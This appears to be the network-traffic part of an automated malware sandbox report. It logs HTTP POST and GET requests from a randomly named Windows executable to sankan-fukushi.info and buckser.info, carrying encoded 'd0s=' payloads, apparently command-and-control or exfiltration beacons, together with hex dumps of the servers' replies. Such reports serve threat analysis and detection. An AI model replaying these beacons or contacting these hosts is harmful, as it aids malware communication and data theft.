                                                                      Data Ascii: 306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.842 4.9-2.02 7.089l1.586 2c.428.536.517 1.267.228 1.889-.289.622-.904 1.027-1.59 1.046l-.004-.004zm26.535 11.408l-17.284-.647c-.997-.038-1.776
                                                                      Nov 27, 2024 08:55:48.657587051 CET1236INData Raw: 34 2d 31 2e 31 33 33 2e 33 35 36 2d 2e 36 38 33 2e 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 30 32 33 2e 31 32 36 2e 30 35 36 2e 32 35 2e 31 2e 33 37 31 2e 33 31 32 2e 37 34 33 20 31 2e 30 34 31 20 31 2e 32 32 34
                                                                      Data Ascii: 4-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.224 1.846 1.218.805-.006 1.528-.497 1.829-1.244l.061-.2.029-.146c.201-.812-.116-1.664-.8-2.146-.332-.231-.727-.355-1.131-.354h-.001zm0-9.692c-.405-.001-.801.124-1.1


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.749923163.44.185.183802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:49.789228916 CET1843OUTPOST /aayz/ HTTP/1.1
                                                                      Host: www.sankan-fukushi.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.sankan-fukushi.info
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1248
                                                                      Connection: close
                                                                      Referer: http://www.sankan-fukushi.info/aayz/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 49 77 4d 6b 76 35 5a 61 58 66 70 39 69 6f 68 72 4f 62 41 4d 77 52 52 39 74 42 67 58 30 4e 71 31 51 32 51 58 4a 41 70 50 63 4c 70 62 33 71 64 30 6b 51 55 68 44 6d 41 72 35 43 4d 6d 58 53 6a 39 4a 68 6c 38 42 35 49 46 67 6d 69 59 45 74 45 44 33 7a 52 33 65 65 35 50 4f 78 68 75 67 5a 5a 50 70 50 2b 5a 6e 55 50 47 6e 4d 70 4c 41 6f 53 53 6c 57 62 6a 70 75 65 6c 75 67 69 38 4f 4d 6f 65 42 44 32 47 45 2f 78 6d 64 36 33 77 4a 36 37 5a 69 38 51 36 51 54 48 4d 68 2f 37 35 49 61 73 66 38 58 4d 78 39 43 58 70 70 74 43 67 2f 57 68 47 42 43 33 68 79 2f 62 41 66 30 42 53 32 32 70 55 6a 58 75 4a 49 38 78 36 44 50 37 4e 66 4e 4d 72 67 4d 73 30 57 76 79 66 66 76 63 4e 62 50 6e 7a 64 68 69 78 34 6e 66 73 42 4b 69 61 32 64 65 56 63 57 66 67 4d 59 67 6b 69 73 6c 78 53 71 30 47 65 77 58 61 35 72 62 65 53 69 63 35 4a 4c 44 46 70 6e 71 67 56 45 79 32 56 46 4e 48 51 58 69 43 45 77 5a 44 45 35 49 42 4e 4b 71 68 77 43 73 56 76 78 5a 33 65 30 53 39 76 71 4c 76 78 4b 32 31 2f 39 69 35 4f 64 63 70 69 37 42 6c 33 6e [TRUNCATED]
                                                                      Data Ascii: d0s=IwMkv5ZaXfp9iohrObAMwRR9tBgX0Nq1Q2QXJApPcLpb3qd0kQUhDmAr5CMmXSj9Jhl8B5IFgmiYEtED3zR3ee5POxhugZZPpP+ZnUPGnMpLAoSSlWbjpuelugi8OMoeBD2GE/xmd63wJ67Zi8Q6QTHMh/75Iasf8XMx9CXpptCg/WhGBC3hy/bAf0BS22pUjXuJI8x6DP7NfNMrgMs0WvyffvcNbPnzdhix4nfsBKia2deVcWfgMYgkislxSq0GewXa5rbeSic5JLDFpnqgVEy2VFNHQXiCEwZDE5IBNKqhwCsVvxZ3e0S9vqLvxK21/9i5Odcpi7Bl3nmL0YhjXyTCRnHjxmCuR7VWa5u+AKAUiQ8wQvgzYRUA1dIhh/ECSqlYDL7OOTxbT2IvMIRZgQecX/nd/OANmBNrn5pywoi821/NNZp8h8RcwtWAdcE91pFf8KqknWxIxrF8YkbgPLJ6Ymiunb4D9BSLyP+Sk2u4P5M+d+giPqfPGz5Q5F2Mmeg5HZi1BUxa3epxeGamcIjcK1MXOog+Sy2dmNvHYpEmTfPIh+h3/iUZZKnlSM70mMY/j3IgEw6gN6L3Be8y2hmEep3xv8/TjGbZFvB9MfkxdcXpmrZKeIzIYZOHRW1hVIiKVylAgmbwQ6il7JC/MgpVZKjajVagLCZq7S4qNBi63DtzG/JfSrf1vc+PcWmaPGWdy9rY0Dtozinvsx9MVSFhm/8xzVJvcG/IqydI8vKC7dHD/GLC7+pGNNo4NdEuzfw3QFRusrypVtlWVZwPecVOOdtL8IOzo9z0/g0GMLiwn4jtDOFe4oVxgtsunpNxuZuwuxdbjENsHD8tQEkdZPkW430DXsvG+EKwedBokbLYiIrxc01SASjItzz2X/xGz/5yVFoq2uqWF2z1LpBJfpG3YaAFC7J89K1gKtQB73DcTzIqx3bvEGgXYrjn/qZL1mMpFrg+uTy3mOU77adv2nAi1Zwke5+8qGmf0Q5H+M5xejFE [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.749929163.44.185.183802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:55:52.438808918 CET546OUTGET /aayz/?d0s=FykEsP9vX91sr4gIXaga4DgAunY4y8OIW35pWix+cNhS3OVLkBIKdkYv5gM3ZSr/GxN1W6QlvHKhJe8Q7ylOVoBzLShipJdbmb6MlmPWhdxEVrWCkEizo+iavQabSegVUCqoN7tDdJKm&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1
                                                                      Host: www.sankan-fukushi.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Connection: close
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Nov 27, 2024 08:55:53.964023113 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 27 Nov 2024 07:55:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 19268
                                                                      Connection: close
                                                                      Server: Apache
                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                      Nov 27, 2024 08:55:53.964051962 CET404INData Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a
                                                                      Data Ascii: line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: center; jus
                                                                      Nov 27, 2024 08:55:53.964063883 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30
                                                                      Data Ascii: -ms-flex-wrap: wrap; flex-wrap: wrap; max-width: 640px; margin: 20px auto; } @media screen and (min-width: 640px) { .lol-error-page__information { -webkit-flex-wrap: nowrap;
                                                                      Nov 27, 2024 08:55:53.964128017 CET1236INData Raw: 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28
                                                                      Data Ascii: position: absolute; z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color:
                                                                      Nov 27, 2024 08:55:53.964139938 CET1236INData Raw: 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c
                                                                      Data Ascii: margin: auto; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right {
                                                                      Nov 27, 2024 08:55:53.964152098 CET1236INData Raw: 34 2d 32 39 2e 39 2d 31 32 2e 30 34 68 2d 2e 33 32 39 63 2d 31 34 2e 31 20 30 2d 32 34 2e 33 31 37 20 33 2e 39 38 38 2d 33 30 2e 31 35 33 20 31 31 2e 38 36 2d 39 2e 34 20 31 32 2e 35 30 37 2d 34 2e 34 38 39 20 33 30 2e 30 31 31 2d 34 2e 33 20 33
                                                                      Data Ascii: 4-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 11.86-9.4 12.507-4.489 30.011-4.3 30.748.052.166.127.323.224.467-.326 3.036-.826 6.051-1.5 9.03-1.691 7.962-3.442 16.209 1.5 22.44 4.942 6.231 15.69 9.155 33.7 9.226h.718c17.583 0 28.1-2.845 33.05
                                                                      Nov 27, 2024 08:55:53.964164972 CET848INData Raw: 37 63 2d 2e 34 36 33 20 30 2d 2e 39 30 38 2d 2e 31 37 39 2d 31 2e 32 34 32 2d 2e 35 6c 2d 31 31 2e 30 34 34 2d 31 30 2e 35 32 37 63 2d 2e 34 30 31 2d 2e 33 39 2d 2e 36 2d 2e 39 34 34 2d 2e 35 33 39 2d 31 2e 35 6c 32 2e 39 39 33 2d 32 33 2e 38 38
                                                                      Data Ascii: 7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.401-.39-.6-.944-.539-1.5l2.993-23.885c.111-.9.874-1.577 1.781-1.58h16.521c.887-.001 1.643.644 1.781 1.52l2.992 23.972c.054.561-.156 1.116-.569 1.5l-11.417 10.538c-.343.311-.794.476-1.257.462z"/><pa
                                                                      Nov 27, 2024 08:55:53.964356899 CET1236INData Raw: 32 20 31 2e 38 33 37 2e 36 36 32 20 32 2e 38 31 33 2e 37 30 37 68 2e 37 33 33 63 32 2e 35 37 36 2e 31 34 32 20 35 2e 30 30 36 2d 31 2e 32 30 31 20 36 2e 32 35 35 2d 33 2e 34 35 38 20 31 2e 31 34 34 2d 32 2e 33 39 39 20 31 2e 37 34 36 2d 35 2e 30
                                                                      Data Ascii: 2 1.837.662 2.813.707h.733c2.576.142 5.006-1.201 6.255-3.458 1.144-2.399 1.746-5.019 1.766-7.676.265-2.556-.016-5.139-.823-7.578zm-62.16 14.494c-.516.39-1.154.583-1.8.542-1.444.307-2.918-.373-3.621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389
                                                                      Nov 27, 2024 08:55:53.964370012 CET1236INData Raw: 2d 31 33 2e 38 20 32 34 2e 32 34 32 2d 33 30 2e 31 39 31 2e 30 31 33 2d 34 2e 33 38 37 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32
                                                                      Data Ascii: -13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.07
                                                                      Nov 27, 2024 08:55:53.964462042 CET1236INData Raw: 2e 32 39 20 35 38 2e 39 30 38 6c 2d 32 2e 33 31 39 2d 32 2e 39 32 73 32 2e 33 39 34 2d 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37
                                                                      Data Ascii: .29 58.908l-2.319-2.92s2.394-4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1
                                                                      Nov 27, 2024 08:55:54.084208012 CET1236INData Raw: 2d 2e 37 33 20 31 2e 31 37 38 63 2d 2e 33 36 31 2e 36 2d 2e 37 33 39 20 31 2e 31 35 33 2d 31 2e 30 39 33 20 31 2e 36 35 37 6c 2d 2e 32 30 38 2e 33 63 2d 2e 33 37 39 2e 35 32 33 2d 2e 37 33 31 20 31 2d 31 2e 30 38 34 20 31 2e 34 34 38 6c 2d 2e 34
                                                                      Data Ascii: -.73 1.178c-.361.6-.739 1.153-1.093 1.657l-.208.3c-.379.523-.731 1-1.084 1.448l-.447.542c-.335.411-.674.784-1 1.142-.74.789-1.536 1.524-2.381 2.2l-.273.218-9.572-.005zm5-10.2c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.749950120.26.240.121802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:56:01.072271109 CET789OUTPOST /xzte/ HTTP/1.1
                                                                      Host: www.buckser.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.buckser.info
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 216
                                                                      Connection: close
                                                                      Referer: http://www.buckser.info/xzte/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 54 4e 4f 42 62 38 56 63 38 54 52 6a 34 71 67 75 54 69 4e 63 6c 4d 64 44 56 46 76 56 63 4b 51 5a 44 59 66 67 49 4e 50 32 32 50 34 51 62 51 31 50 69 72 72 61 72 74 37 69 76 65 47 74 2f 49 67 72 42 42 52 6e 51 56 38 43 61 38 5a 38 6f 44 57 52 36 58 39 32 75 36 61 35 33 66 6b 74 6b 73 38 71 4c 4e 4c 41 77 4b 42 73 35 70 64 61 46 51 50 4f 33 54 59 51 56 31 63 33 64 44 63 65 6d 77 55 79 6d 36 6f 35 35 2f 52 31 4a 38 6d 4d 31 61 64 59 35 38 6d 4a 55 65 6f 30 31 65 44 59 47 70 77 67 39 32 33 4a 78 57 44 6e 64 6c 39 5a 6d 51 49 7a 52 49 65 53 4c 45 35 6d 43 31 6b 73 6a 6f 31 73 76 6d 66 46 37 6a 43 35 4e 74 52 4f 37 38 62 54 73 41 3d 3d
                                                                      Data Ascii: d0s=TNOBb8Vc8TRj4qguTiNclMdDVFvVcKQZDYfgINP22P4QbQ1Pirrart7iveGt/IgrBBRnQV8Ca8Z8oDWR6X92u6a53fktks8qLNLAwKBs5pdaFQPO3TYQV1c3dDcemwUym6o55/R1J8mM1adY58mJUeo01eDYGpwg923JxWDndl9ZmQIzRIeSLE5mC1ksjo1svmfF7jC5NtRO78bTsA==
                                                                      Nov 27, 2024 08:56:02.648123026 CET767INHTTP/1.1 403 Forbidden
                                                                      Server: Beaver
                                                                      Cache-Control: no-cache
                                                                      Content-Type: text/html
                                                                      Content-Length: 635
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED]
                                                                      Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.749956120.26.240.121802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:56:03.744219065 CET809OUTPOST /xzte/ HTTP/1.1
                                                                      Host: www.buckser.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.buckser.info
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 236
                                                                      Connection: close
                                                                      Referer: http://www.buckser.info/xzte/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 54 4e 4f 42 62 38 56 63 38 54 52 6a 34 4f 63 75 49 42 6c 63 74 4d 64 41 4a 56 76 56 56 71 51 64 44 59 44 67 49 50 6a 6d 71 74 73 51 63 78 46 50 6a 70 44 61 71 74 37 69 6b 2b 47 6b 67 59 67 69 42 42 4d 61 51 52 38 43 61 38 39 38 6f 42 4f 52 36 47 39 35 73 71 61 37 38 2f 6b 72 35 63 38 71 4c 4e 4c 41 77 4b 45 42 35 70 56 61 45 6a 6e 4f 32 79 59 58 57 31 63 6f 4e 54 63 65 73 51 55 32 6d 36 6f 62 35 2b 4e 54 4a 2b 4f 4d 31 59 56 59 35 75 43 49 50 75 6f 79 6f 4f 43 4a 4b 73 5a 4e 36 47 6e 5a 7a 47 66 67 45 43 38 6d 71 47 4a 52 4c 71 53 2b 56 56 42 64 47 33 41 61 30 4f 6f 5a 74 6e 62 64 32 42 32 59 53 61 30 6b 32 75 36 58 36 35 7a 52 31 68 34 6b 76 4f 44 61 33 39 43 44 70 35 37 56 4b 55 63 3d
                                                                      Data Ascii: d0s=TNOBb8Vc8TRj4OcuIBlctMdAJVvVVqQdDYDgIPjmqtsQcxFPjpDaqt7ik+GkgYgiBBMaQR8Ca898oBOR6G95sqa78/kr5c8qLNLAwKEB5pVaEjnO2yYXW1coNTcesQU2m6ob5+NTJ+OM1YVY5uCIPuoyoOCJKsZN6GnZzGfgEC8mqGJRLqS+VVBdG3Aa0OoZtnbd2B2YSa0k2u6X65zR1h4kvODa39CDp57VKUc=
                                                                      Nov 27, 2024 08:56:05.304394007 CET767INHTTP/1.1 403 Forbidden
                                                                      Server: Beaver
                                                                      Cache-Control: no-cache
                                                                      Content-Type: text/html
                                                                      Content-Length: 635
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 [TRUNCATED]
                                                                      Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000004252206681"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.749962120.26.240.121802340C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 08:56:06.415921926 CET1822OUTPOST /xzte/ HTTP/1.1
                                                                      Host: www.buckser.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US
                                                                      Origin: http://www.buckser.info
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1248
                                                                      Connection: close
                                                                      Referer: http://www.buckser.info/xzte/
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                      Data Raw: 64 30 73 3d 54 4e 4f 42 62 38 56 63 38 54 52 6a 34 4f 63 75 49 42 6c 63 74 4d 64 41 4a 56 76 56 56 71 51 64 44 59 44 67 49 50 6a 6d 71 74 30 51 62 44 4e 50 69 49 44 61 70 74 37 69 2f 65 47 68 67 59 68 67 42 42 45 65 51 52 34 4e 61 2b 56 38 6e 43 47 52 72 43 4a 35 6c 71 61 37 7a 66 6b 75 6b 73 38 2f 4c 4e 62 45 77 4b 30 42 35 70 56 61 45 6d 6a 4f 6d 54 59 58 51 31 63 33 64 44 64 4b 6d 77 55 65 6d 36 77 68 35 2b 5a 6c 4a 4f 75 4d 31 34 46 59 38 64 6d 49 44 75 6f 77 70 4f 43 52 4b 73 64 4f 36 47 72 76 7a 46 44 4f 45 46 49 6d 6f 79 42 4d 5a 76 79 30 4b 32 31 34 42 42 67 74 7a 64 34 49 30 45 62 46 35 43 50 35 4a 71 55 79 75 59 47 33 2b 63 48 54 6f 53 5a 62 6d 66 37 4a 36 61 72 48 37 61 76 30 57 42 75 72 50 4f 36 38 77 2f 56 79 67 4c 30 78 73 2f 61 6a 70 2b 76 67 39 30 55 66 4d 71 55 58 2f 68 4b 47 4d 6a 55 4f 72 54 4e 38 4d 52 56 76 6b 49 34 43 4f 4f 4c 56 66 6f 2b 4f 65 52 6d 51 56 59 4a 79 4c 71 35 4c 44 6b 35 61 78 50 72 66 76 6a 62 6d 6e 77 4e 53 4a 52 7a 79 67 73 4e 7a 76 33 6b 30 49 58 7a 79 4a 4a [TRUNCATED]
